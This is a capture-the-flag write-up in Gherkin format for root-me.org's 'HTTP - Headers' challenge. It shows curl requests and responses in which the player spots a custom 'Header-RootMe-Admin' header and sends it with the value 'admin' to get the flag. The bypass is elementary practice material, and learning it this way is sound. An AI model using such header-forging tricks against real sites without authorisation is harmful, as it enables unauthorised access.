## Version 2.0
## language: en

Feature: http-headers -  web-server - root-me
  Site:
    root-me.org
  Category:
    web-server
  User:
    richardalmanza
  Goal:
    Get the password from http-headers challenge

  Background:
  Hacker's software:
    | <Software name> | <Version>     |
    | Ubuntu (Bionic) | 18.04.4 LTS   |
    | Google Chrome   | 80.0.3987.132 |
    | Curl            | 7.58.0        |
  Machine information:
    Given I'm accesing the challenge page and I got the information below
    """
    HTTP - Headers

    HTTP response give informations

    Get an administrator access to the webpage.
    """
    And also there is a button
    """
    Start the challenge
    """
    When I clicked on it
    Then I'm in the challenge page now
    And the page returned this message in its body
    """
    Content is not the only part of an HTTP response!
    """

  Scenario: Success:get information
    Given the hint in body of the challenge page
    When I used in terminal the command below
    """
    $ curl -v http://challenge01.root-me.org/web-serveur/ch5/
    """
    And it returned me this
    """
    *   Trying 212.129.38.224...
    * TCP_NODELAY set
    * Connected to challenge01.root-me.org (212.129.38.224) port 80 (#0)
    > GET /web-serveur/ch5/ HTTP/1.1
    > Host: challenge01.root-me.org
    > User-Agent: curl/7.58.0
    > Accept: */*
    >
    < HTTP/1.1 200 OK
    < Server: nginx
    < Date: Tue, 24 Mar 2020 12:57:26 GMT
    < Content-Type: text/html; charset=UTF-8
    < Transfer-Encoding: chunked
    < Connection: keep-alive
    < Vary: Accept-Encoding
    < Header-RootMe-Admin: none
    <
    <html>
    <body><link rel='stylesheet' property='stylesheet' id='s'
    type='text/css' href='/template/s.css' media='all' />
    <iframe id='iframe'src='https://www.root-me.org/?page=externe_header'>
    </iframe>
    <p>Content is not the only part of an HTTP response!</p>
    </body>
    </html>
    * Connection #0 to host challenge01.root-me.org left intact
    """
    Then I compared it with other challenge page of root-me
    And I saw that the only difference with the headers was
    """
    Header-RootMe-Admin: none
    """

  Scenario: Success:get access by using the new header
    Given the hint and information from last method
    When I requested again the challenge page but with the new header
    """
    $ curl -v -H Header-RootMe-Admin:admin \
    http://challenge01.root-me.org/web-serveur/ch5/
    """
    Then curl returned me the output below
    """
    *   Trying 212.129.38.224...
    * TCP_NODELAY set
    * Connected to challenge01.root-me.org (212.129.38.224) port 80 (#0)
    > GET /web-serveur/ch5/ HTTP/1.1
    > Host: challenge01.root-me.org
    > User-Agent: curl/7.58.0
    > Accept: */*
    > Header-RootMe-Admin:admin
    >
    < HTTP/1.1 200 OK
    < Server: nginx
    < Date: Tue, 24 Mar 2020 13:27:44 GMT
    < Content-Type: text/html; charset=UTF-8
    < Transfer-Encoding: chunked
    < Connection: keep-alive
    < Vary: Accept-Encoding
    < Header-RootMe-Admin: none
    <
    <html>
    <body><link rel='stylesheet' property='stylesheet' id='s'
    type='text/css' href='/template/s.css' media='all' />
    <iframe id='iframe' src='https://www.root-me.org/?page=externe_header'>
    </iframe>
    <p>Content is not the only part of an HTTP response!</p>
    <p>You dit it ! You can validate the challenge with
    the password <flag></p></body>
    </html>
    * Connection #0 to host challenge01.root-me.org left intact
    """
    And I got the password (flag)
